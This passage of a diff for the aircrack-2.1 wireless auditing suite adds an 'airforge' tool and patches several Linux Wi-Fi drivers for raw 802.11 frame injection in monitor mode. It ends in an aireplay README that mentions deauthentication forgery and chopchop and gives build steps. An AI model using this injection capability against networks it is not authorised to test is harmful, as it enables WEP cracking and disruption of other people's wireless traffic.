2010 + { 0x64,0xCC,0x4A,0xDD }, { 0x25,0xCA,0x3B,0x06 }, { 0xA7,0xC6,0xD9,0xB0 }, { 0xE6,0xC0,0xA8,0x6B },
2011 + { 0xE2,0xD9,0x6C,0x06 }, { 0xA3,0xDF,0x1D,0xDD }, { 0x21,0xD3,0xFF,0x6B }, { 0x60,0xD5,0x8E,0xB0 },
2012 + { 0xC6,0x08,0x88,0x05 }, { 0x87,0x0E,0xF9,0xDE }, { 0x05,0x02,0x1B,0x68 }, { 0x44,0x04,0x6A,0xB3 },
2013 + { 0x40,0x1D,0xAE,0xDE }, { 0x01,0x1B,0xDF,0x05 }, { 0x83,0x17,0x3D,0xB3 }, { 0xC2,0x11,0x4C,0x68 },
2014 + { 0x8B,0x25,0xB5,0x68 }, { 0xCA,0x23,0xC4,0xB3 }, { 0x48,0x2F,0x26,0x05 }, { 0x09,0x29,0x57,0xDE },
2015 + { 0x0D,0x30,0x93,0xB3 }, { 0x4C,0x36,0xE2,0x68 }, { 0xCE,0x3A,0x00,0xDE }, { 0x8F,0x3C,0x71,0x05 },
2016 + { 0x5C,0x52,0xF2,0xDF }, { 0x1D,0x54,0x83,0x04 }, { 0x9F,0x58,0x61,0xB2 }, { 0xDE,0x5E,0x10,0x69 },
2017 + { 0xDA,0x47,0xD4,0x04 }, { 0x9B,0x41,0xA5,0xDF }, { 0x19,0x4D,0x47,0x69 }, { 0x58,0x4B,0x36,0xB2 },
2018 + { 0x11,0x7F,0xCF,0xB2 }, { 0x50,0x79,0xBE,0x69 }, { 0xD2,0x75,0x5C,0xDF }, { 0x93,0x73,0x2D,0x04 },
2019 + { 0x97,0x6A,0xE9,0x69 }, { 0xD6,0x6C,0x98,0xB2 }, { 0x54,0x60,0x7A,0x04 }, { 0x15,0x66,0x0B,0xDF },
2020 + { 0x59,0xDD,0x06,0xB5 }, { 0x18,0xDB,0x77,0x6E }, { 0x9A,0xD7,0x95,0xD8 }, { 0xDB,0xD1,0xE4,0x03 },
2021 + { 0xDF,0xC8,0x20,0x6E }, { 0x9E,0xCE,0x51,0xB5 }, { 0x1C,0xC2,0xB3,0x03 }, { 0x5D,0xC4,0xC2,0xD8 },
2022 + { 0x14,0xF0,0x3B,0xD8 }, { 0x55,0xF6,0x4A,0x03 }, { 0xD7,0xFA,0xA8,0xB5 }, { 0x96,0xFC,0xD9,0x6E },
2023 + { 0x92,0xE5,0x1D,0x03 }, { 0xD3,0xE3,0x6C,0xD8 }, { 0x51,0xEF,0x8E,0x6E }, { 0x10,0xE9,0xFF,0xB5 },
2024 + { 0xC3,0x87,0x7C,0x6F }, { 0x82,0x81,0x0D,0xB4 }, { 0x00,0x8D,0xEF,0x02 }, { 0x41,0x8B,0x9E,0xD9 },
2025 + { 0x45,0x92,0x5A,0xB4 }, { 0x04,0x94,0x2B,0x6F }, { 0x86,0x98,0xC9,0xD9 }, { 0xC7,0x9E,0xB8,0x02 },
2026 + { 0x8E,0xAA,0x41,0x02 }, { 0xCF,0xAC,0x30,0xD9 }, { 0x4D,0xA0,0xD2,0x6F }, { 0x0C,0xA6,0xA3,0xB4 },
2027 + { 0x08,0xBF,0x67,0xD9 }, { 0x49,0xB9,0x16,0x02 }, { 0xCB,0xB5,0xF4,0xB4 }, { 0x8A,0xB3,0x85,0x6F },
2028 + { 0x2C,0x6E,0x83,0xDA }, { 0x6D,0x68,0xF2,0x01 }, { 0xEF,0x64,0x10,0xB7 }, { 0xAE,0x62,0x61,0x6C },
2029 + { 0xAA,0x7B,0xA5,0x01 }, { 0xEB,0x7D,0xD4,0xDA }, { 0x69,0x71,0x36,0x6C }, { 0x28,0x77,0x47,0xB7 },
2030 + { 0x61,0x43,0xBE,0xB7 }, { 0x20,0x45,0xCF,0x6C }, { 0xA2,0x49,0x2D,0xDA }, { 0xE3,0x4F,0x5C,0x01 },
2031 + { 0xE7,0x56,0x98,0x6C }, { 0xA6,0x50,0xE9,0xB7 }, { 0x24,0x5C,0x0B,0x01 }, { 0x65,0x5A,0x7A,0xDA },
2032 + { 0xB6,0x34,0xF9,0x00 }, { 0xF7,0x32,0x88,0xDB }, { 0x75,0x3E,0x6A,0x6D }, { 0x34,0x38,0x1B,0xB6 },
2033 + { 0x30,0x21,0xDF,0xDB }, { 0x71,0x27,0xAE,0x00 }, { 0xF3,0x2B,0x4C,0xB6 }, { 0xB2,0x2D,0x3D,0x6D },
2034 + { 0xFB,0x19,0xC4,0x6D }, { 0xBA,0x1F,0xB5,0xB6 }, { 0x38,0x13,0x57,0x00 }, { 0x79,0x15,0x26,0xDB },
2035 + { 0x7D,0x0C,0xE2,0xB6 }, { 0x3C,0x0A,0x93,0x6D }, { 0xBE,0x06,0x71,0xDB }, { 0xFF,0x00,0x00,0x00 }
2038 +#endif /* crctable.h */
2039 diff -urN aircrack-2.1.orig/Makefile aircrack-2.1/Makefile
2040 --- aircrack-2.1.orig/Makefile 2004-10-01 21:30:00.000000000 +0200
2041 +++ aircrack-2.1/Makefile 2005-04-22 08:53:15.398815552 +0200
2043 docdir = $(datadir)/aircrack
2046 -BINFILES = 802ether aircrack aireplay airodump hopper.sh
2047 +BINFILES = 802ether aircrack aireplay airodump airforge hopper.sh
2048 DOCFILES = ChangeLog rawsend.patch docs/aircrack.html
2051 $(CC) $(CFLAGS) $(OPTFLAGS) 802ether.c -o 802ether
2052 $(CC) $(CFLAGS) $(OPTFLAGS) aircrack.c -o aircrack
2053 $(CC) $(CFLAGS) $(OPTFLAGS) aireplay.c -o aireplay
2054 + $(CC) $(CFLAGS) $(OPTFLAGS) airforge.c -o airforge
2055 $(CC) $(CFLAGS) $(OPTFLAGS) airodump.c -o airodump
2059 install -m 644 $(DOCFILES) $(DESTDIR)$(docdir)
2062 - rm -f *.o 802ether aircrack aireplay airodump
2063 + rm -f *.o 802ether aircrack aireplay airforge airodump
2064 diff -urN aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1
2065 --- aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2066 +++ aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1 2005-04-22 08:51:21.935064664 +0200
2068 +diff -aur hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c
2069 +--- hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c 2004-07-06 01:45:01.000000000 +0200
2070 ++++ hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c 2005-03-14 13:53:20.000000000 +0100
2071 +@@ -466,7 +466,7 @@
2076 ++ if (tx.crypt && memcmp(tx.crypt->priv+4,"\x01\x02\x04\x08\x10",5)) {
2077 + skb = hostap_tx_encrypt(skb, tx.crypt);
2078 + if (skb == NULL) {
2079 + printk(KERN_DEBUG "%s: TX - encryption failed\n",
2080 diff -urN aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
2081 --- aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2082 +++ aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 2005-04-22 08:51:21.936064512 +0200
2084 +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c
2085 +--- linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c 2005-01-11 18:43:54.000000000 +0100
2086 ++++ linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c 2005-03-14 13:58:11.000000000 +0100
2087 +@@ -525,7 +525,7 @@
2088 + * and return success .
2089 + * TODO: we need a saner way to handle this
2091 +- if(skb->protocol != ETH_P_80211_RAW) {
2092 ++ if(skb->protocol != htons(ETH_P_80211_RAW)) {
2093 + p80211netdev_start_queue(wlandev);
2095 + "Tx attempt prior to association, frame dropped.\n");
2096 +@@ -537,7 +537,7 @@
2099 + /* Check for raw transmits */
2100 +- if(skb->protocol == ETH_P_80211_RAW) {
2101 ++ if(skb->protocol == htons(ETH_P_80211_RAW)) {
2102 + if (!capable(CAP_NET_ADMIN)) {
2105 +@@ -965,8 +965,9 @@
2106 + dev->set_mac_address = p80211knetdev_set_mac_address;
2108 + #ifdef HAVE_TX_TIMEOUT
2109 +- dev->tx_timeout = &p80211knetdev_tx_timeout;
2110 +- dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
2111 ++// KoreK: still not implemented
2112 ++// dev->tx_timeout = &p80211knetdev_tx_timeout;
2113 ++// dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
2117 +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile
2118 +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile 2005-01-25 02:41:44.000000000 +0100
2119 ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile 2005-03-14 13:58:11.000000000 +0100
2121 + MODVERDIR=$(WLAN_SRC)/.tmp_versions modules
2124 +- $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(PWD) \
2125 ++ $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(WLAN_SRC) \
2128 + endif # kbuild switch
2129 +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c
2130 +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c 2005-01-25 01:38:50.000000000 +0100
2131 ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c 2005-03-14 15:21:02.000000000 +0100
2132 +@@ -1941,8 +1941,14 @@
2136 +- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2137 +- HFA384x_CMD_AINFO_SET(enable);
2138 ++ if (enable == HFA384x_MONITOR_ENABLE) {
2139 ++ // KoreK: get into test mode 0x0a
2140 ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2141 ++ HFA384x_CMD_AINFO_SET(0x0a);
2143 ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2144 ++ HFA384x_CMD_AINFO_SET(enable);
2149 +@@ -3178,13 +3184,26 @@
2150 + HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
2153 +- /* if we're using host WEP, increase size by IV+ICV */
2154 +- if (p80211_wep->data) {
2155 +- txdesc.data_len = host2hfa384x_16(skb->len+8);
2156 +- // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2158 +- txdesc.data_len = host2hfa384x_16(skb->len);
2160 ++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
2161 ++ /* if we're using host WEP, increase size by IV+ICV */
2162 ++ if (p80211_wep->data) {
2163 ++ txdesc.data_len = host2hfa384x_16(skb->len+8);
2164 ++ // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2166 ++ txdesc.data_len = host2hfa384x_16(skb->len);
2169 ++ /* KoreK: raw injection (monitor mode): pull the rest of
2170 ++ the header and ssanity check on txdesc.data_len */
2171 ++ memcpy(&(txdesc.data_len), skb->data, 16);
2172 ++ skb_pull(skb,16);
2173 ++ if (txdesc.data_len != host2hfa384x_16(skb->len)) {
2174 ++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
2178 ++ txdesc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
2181 + txdesc.tx_control = host2hfa384x_16(txdesc.tx_control);
2182 + /* copy the header over to the txdesc */
2183 +@@ -3207,7 +3226,7 @@
2184 + spin_lock(&hw->cmdlock);
2186 + /* Copy descriptor+payload to FID */
2187 +- if (p80211_wep->data) {
2188 ++ if (p80211_wep->data && (skb->protocol != htons(ETH_P_80211_RAW))) {
2189 + result = hfa384x_copy_to_bap4(hw, HFA384x_BAP_PROC, fid, 0,
2190 + &txdesc, sizeof(txdesc),
2191 + p80211_wep->iv, sizeof(p80211_wep->iv),
2192 +@@ -3657,6 +3676,16 @@
2193 + switch( HFA384x_RXSTATUS_MACPORT_GET(rxdesc.status) )
2196 ++ /* KoreK: this testmode uses macport 0 */
2197 ++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
2198 ++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
2199 ++ if ( ! HFA384x_RXSTATUS_ISFCSERR(rxdesc.status) ) {
2200 ++ hfa384x_int_rxmonitor( wlandev, rxfid, &rxdesc);
2202 ++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
2207 + fc = ieee2host16(rxdesc.frame_control);
2209 +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c
2210 +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c 2005-01-17 17:24:40.000000000 +0100
2211 ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c 2005-03-14 15:27:57.000000000 +0100
2212 +@@ -1143,8 +1143,14 @@
2216 +- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2217 +- HFA384x_CMD_AINFO_SET(enable);
2218 ++ if (enable == HFA384x_MONITOR_ENABLE) {
2219 ++ // KoreK: get into test mode 0x0a
2220 ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2221 ++ HFA384x_CMD_AINFO_SET(0x0a);
2223 ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2224 ++ HFA384x_CMD_AINFO_SET(enable);
2229 +@@ -3258,37 +3264,59 @@
2230 + HFA384x_TX_MACPORT_SET(0) | HFA384x_TX_STRUCTYPE_SET(1) |
2231 + HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
2233 +- hw->txbuff.txfrm.desc.tx_control =
2234 +- host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
2236 +- /* copy the header over to the txdesc */
2237 +- memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr, sizeof(p80211_hdr_t));
2238 ++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
2239 ++ hw->txbuff.txfrm.desc.tx_control =
2240 ++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
2242 ++ /* copy the header over to the txdesc */
2243 ++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
2244 ++ sizeof(p80211_hdr_t));
2246 ++ /* if we're using host WEP, increase size by IV+ICV */
2247 ++ if (p80211_wep->data) {
2248 ++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
2249 ++ // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2252 ++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
2255 ++ /* KoreK: raw injection (monitor mode): pull the rest of
2256 ++ the header and ssanity check on txdesc.data_len */
2257 ++ memcpy(&(hw->txbuff.txfrm.desc.data_len), skb->data, 16);
2258 ++ skb_pull(skb,16);
2259 ++ if (hw->txbuff.txfrm.desc.data_len != host2hfa384x_16(skb->len)) {
2260 ++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
2264 +- /* if we're using host WEP, increase size by IV+ICV */
2265 +- if (p80211_wep->data) {
2266 +- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
2267 +- // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2270 +- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
2271 ++ hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
2272 ++ hw->txbuff.txfrm.desc.tx_control =
2273 ++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
2275 ++ /* copy the header over to the txdesc */
2276 ++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
2277 ++ sizeof(p80211_hdr_t));
2280 + usbpktlen += skb->len;
2282 + /* copy over the WEP IV if we are using host WEP */
2283 + ptr = hw->txbuff.txfrm.data;
2284 +- if (p80211_wep->data) {
2285 ++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
2286 + memcpy(ptr, p80211_wep->iv, sizeof(p80211_wep->iv));
2287 + ptr+= sizeof(p80211_wep->iv);
2288 + memcpy(ptr, p80211_wep->data, skb->len);
2290 + memcpy(ptr, skb->data, skb->len);
2293 + /* copy over the packet data */
2296 + /* copy over the WEP ICV if we are using host WEP */
2297 +- if (p80211_wep->data) {
2298 ++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) {
2299 + memcpy(ptr, p80211_wep->icv, sizeof(p80211_wep->icv));
2302 +@@ -4105,6 +4133,17 @@
2303 + switch( HFA384x_RXSTATUS_MACPORT_GET(usbin->rxfrm.desc.status))
2306 ++ /* KoreK: this testmode uses macport 0 */
2307 ++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
2308 ++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
2309 ++ if ( ! HFA384x_RXSTATUS_ISFCSERR(usbin->rxfrm.desc.status) ) {
2310 ++ hfa384x_int_rxmonitor(wlandev, &usbin->rxfrm);
2312 ++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
2317 + w_hdr = (p80211_hdr_t *) &(usbin->rxfrm.desc.frame_control);
2318 + fc = ieee2host16(usbin->rxfrm.desc.frame_control);
2320 +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c
2321 +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c 2005-01-25 01:38:50.000000000 +0100
2322 ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c 2005-03-14 13:58:11.000000000 +0100
2323 +@@ -2855,9 +2855,10 @@
2326 + /* Now if we're already sniffing, we can skip the rest */
2327 +- if (wlandev->netdev->type != ARPHRD_ETHER) {
2328 ++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
2329 ++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
2330 + /* Set the port type to pIbss */
2331 +- word = HFA384x_PORTTYPE_PSUEDOIBSS;
2332 ++ word = 5; // HFA384x_PORTTYPE_PSUEDOIBSS;
2333 + result = hfa384x_drvr_setconfig16(hw,
2334 + HFA384x_RID_CNFPORTTYPE, word);
2336 +@@ -2869,6 +2870,8 @@
2338 + if ((msg->keepwepflags.status == P80211ENUM_msgitem_status_data_ok) && (msg->keepwepflags.data != P80211ENUM_truth_true)) {
2339 + /* Set the wepflags for no decryption */
2340 ++ /* doesn't work - done from the CLI */
2342 + word = HFA384x_WEPFLAGS_DISABLE_TXCRYPT |
2343 + HFA384x_WEPFLAGS_DISABLE_RXCRYPT;
2344 + result = hfa384x_drvr_setconfig16(hw, HFA384x_RID_CNFWEPFLAGS, word);
2345 +@@ -2914,7 +2917,8 @@
2349 +- if (wlandev->netdev->type == ARPHRD_ETHER) {
2350 ++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) &&
2351 ++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) {
2352 + WLAN_LOG_INFO("monitor mode enabled\n");
2355 +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c
2356 +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c 2005-01-25 01:38:50.000000000 +0100
2357 ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c 2005-03-14 13:58:11.000000000 +0100
2358 +@@ -649,7 +649,8 @@
2361 + /* If necessary, set the 802.11 WEP bit */
2362 +- if ((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED) {
2363 ++ if (((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED)
2364 ++ && (skb->protocol != htons(ETH_P_80211_RAW))) {
2365 + p80211_hdr->a3.fc |= host2ieee16(WLAN_SET_FC_ISWEP(1));
2368 diff -urN aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 aircrack-2.1/patch/madwifi-20050309.patch.0.1
2369 --- aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2370 +++ aircrack-2.1/patch/madwifi-20050309.patch.0.1 2005-04-22 08:51:21.936064512 +0200
2372 +diff -ur madwifi/ath/if_ath.c madwifi-foo/ath/if_ath.c
2373 +--- madwifi/ath/if_ath.c 2005-03-09 14:48:52.000000000 -0500
2374 ++++ madwifi-foo/ath/if_ath.c 2005-03-09 22:02:12.000000000 -0500
2375 +@@ -1113,7 +1113,8 @@
2377 + * Encapsulate the packet for transmission.
2379 +- skb = ieee80211_encap(ic, skb, &ni);
2380 ++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
2381 ++ skb = ieee80211_encap(ic, skb, &ni);
2382 + if (skb == NULL) {
2383 + DPRINTF(sc, ATH_DEBUG_XMIT,
2384 + "%s: discard, encapsulation failure\n", __func__);
2385 +@@ -2843,7 +2844,7 @@
2386 + hdrlen = ieee80211_anyhdrsize(wh);
2387 + pktlen = skb->len;
2390 ++ if (iswep && ic->ic_opmode != IEEE80211_M_MONITOR) {
2391 + const struct ieee80211_cipher *cip;
2392 + struct ieee80211_key *k;
2394 +@@ -2905,7 +2906,7 @@
2395 + * use short preamble based on the current mode and
2396 + * negotiated parameters.
2398 +- if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) &&
2399 ++ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && ni != NULL &&
2400 + (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) {
2401 + shortPreamble = AH_TRUE;
2402 + sc->sc_stats.ast_tx_shortpre++;
2403 +@@ -2920,6 +2921,11 @@
2405 + switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) {
2406 + case IEEE80211_FC0_TYPE_MGT:
2407 ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2408 ++ atype = HAL_PKT_TYPE_NORMAL; /* default */
2409 ++ txq = sc->sc_ac2q[skb->priority];
2412 + subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
2413 + if (subtype == IEEE80211_FC0_SUBTYPE_BEACON)
2414 + atype = HAL_PKT_TYPE_BEACON;
2415 +@@ -2939,6 +2945,11 @@
2416 + txq = sc->sc_ac2q[WME_AC_VO];
2418 + case IEEE80211_FC0_TYPE_CTL:
2419 ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2420 ++ atype = HAL_PKT_TYPE_NORMAL; /* default */
2421 ++ txq = sc->sc_ac2q[skb->priority];
2424 + atype = HAL_PKT_TYPE_PSPOLL; /* stop setting of duration */
2425 + rix = 0; /* XXX lowest rate */
2426 + try0 = ATH_TXMAXTRY;
2427 +@@ -2951,11 +2962,14 @@
2429 + case IEEE80211_FC0_TYPE_DATA:
2430 + atype = HAL_PKT_TYPE_NORMAL; /* default */
2431 ++ rix = 0; /* XXX lowest rate */
2432 ++ try0 = ATH_TXMAXTRY;
2434 + * Data frames; consult the rate control module.
2436 +- ath_rate_findrate(sc, an, shortPreamble, skb->len,
2437 +- &rix, &try0, &txrate);
2438 ++ if (ic->ic_opmode != IEEE80211_M_MONITOR)
2439 ++ ath_rate_findrate(sc, an, shortPreamble, skb->len,
2440 ++ &rix, &try0, &txrate);
2442 + * Default all non-QoS traffic to the background queue.
2444 +@@ -2966,6 +2980,11 @@
2445 + txq = sc->sc_ac2q[WME_AC_BK];
2448 ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2449 ++ atype = HAL_PKT_TYPE_NORMAL; /* default */
2450 ++ txq = sc->sc_ac2q[skb->priority];
2453 + printk("%s: bogus frame type 0x%x (%s)\n", dev->name,
2454 + wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__);
2455 + /* XXX statistic */
2456 +@@ -3068,6 +3087,12 @@
2457 + ieee80211_dump_pkt(skb->data, skb->len,
2458 + sc->sc_hwmap[txrate], -1);
2460 ++ /* Let those crazy kids transmit frames in monitor mode */
2461 ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) {
2462 ++ /* Only transmit one frame, disable retrans */
2467 + * Determine if a tx interrupt should be generated for
2468 + * this descriptor. We take a tx interrupt to reap
2469 +@@ -3096,7 +3121,7 @@
2470 + , pktlen /* packet length */
2471 + , hdrlen /* header length */
2472 + , atype /* Atheros packet type */
2473 +- , MIN(ni->ni_txpower,60)/* txpower */
2474 ++ , 60 /* txpower */
2475 + , txrate, try0 /* series 0 rate/tries */
2476 + , keyix /* key cache index */
2477 + , sc->sc_txantenna /* antenna mode */
2478 +@@ -3104,6 +3129,7 @@
2479 + , ctsrate /* rts/cts rate */
2480 + , ctsduration /* rts/cts duration */
2484 + * Setup the multi-rate retry state only when we're
2485 + * going to use it. This assumes ath_hal_setuptxdesc
2486 +@@ -3111,7 +3137,7 @@
2487 + * when the hardware supports multi-rate retry and
2488 + * we don't use it.
2490 +- if (try0 != ATH_TXMAXTRY)
2491 ++ if (try0 != ATH_TXMAXTRY && ic->ic_opmode != IEEE80211_M_MONITOR)
2492 + ath_rate_setupxtxdesc(sc, an, ds, shortPreamble, rix);
2495 diff -urN aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1
2496 --- aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2497 +++ aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1 2005-04-22 08:51:21.937064360 +0200
2499 +diff -u prism54/islpci_eth.c prism54-diff/islpci_eth.c
2500 +--- prism54/islpci_eth.c 2004-12-24 16:33:51.000000000 -0500
2501 ++++ prism54-diff/islpci_eth.c 2005-03-02 16:44:15.000000000 -0500
2504 + /* determine the amount of fragments needed to store the frame */
2506 +- frame_size = skb->len < ETH_ZLEN ? ETH_ZLEN : skb->len;
2507 ++ frame_size = skb->len;
2511 diff -urN aircrack-2.1.orig/pcap-aireplay.h aircrack-2.1/pcap-aireplay.h
2512 --- aircrack-2.1.orig/pcap-aireplay.h 1970-01-01 01:00:00.000000000 +0100
2513 +++ aircrack-2.1/pcap-aireplay.h 2005-04-22 08:51:21.937064360 +0200
2518 +#include <sys/time.h>
2520 +#define IVSONLY_MAGIC "\xBF\xCA\x84\xD4"
2521 +#define TCPDUMP_MAGIC 0xA1B2C3D4
2522 +#define TCPDUMP_CIGAM 0xD4C3B2A1
2523 +#define PCAP_VERSION_MAJOR 2
2524 +#define PCAP_VERSION_MINOR 4
2525 +#define LINKTYPE_ETHERNET 1
2526 +#define LINKTYPE_IEEE802_11 105
2527 +#define LINKTYPE_PRISM_HEADER 119
2529 +struct pcap_file_header
2531 + unsigned int magic;
2532 + unsigned short version_major;
2533 + unsigned short version_minor;
2535 + unsigned int sigfigs;
2536 + unsigned int snaplen;
2537 + unsigned int linktype;
2544 + unsigned int caplen;
2548 +#define SWAP32(x) \
2549 + x = ( ( ( x >> 24 ) & 0x000000FF ) | \
2550 + ( ( x >> 8 ) & 0x0000FF00 ) | \
2551 + ( ( x << 8 ) & 0x00FF0000 ) | \
2552 + ( ( x << 24 ) & 0xFF000000 ) );
2554 +#endif /* common.h */
2555 diff -urN aircrack-2.1.orig/README aircrack-2.1/README
2556 --- aircrack-2.1.orig/README 1970-01-01 01:00:00.000000000 +0100
2557 +++ aircrack-2.1/README 2005-04-22 08:51:21.938064208 +0200
2563 + aireplay mini-howto
2568 + Example test setup:
2570 + * Acess Point (hostap) - 00:02:2D:AA:9C:13 , 10.0.0.1
2571 + * Wireless client (madwifi) - 00:09:5B:FC:21:F4 , 10.0.0.2
2572 + * Laptop with a Prism2 or Atheros of Prism54 card
2575 + 0. Changes since last release
2576 + =============================
2578 + * built-in chopchop operation mode
2579 + * added a bunch of options in aireplay
2580 + * added deauthentication frame forgery
2581 + * Prism2 (wlan-ng) USB device support
2582 + * Atheros (madwifi) and Prism54 device support
2585 + 1. Driver recompilation
2586 + =======================
2588 + 1.1. Installing linux-wlan-ng-0.2.1-pre26
2589 + -----------------------------------------
2591 +First, make sure you have updated your card's station and primary
2592 +firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1.
2595 +wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2
2596 +tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
2597 +cd linux-wlan-ng-0.2.1-pre26
2598 +patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
2601 +find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
2602 +make -C src install
2603 +cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
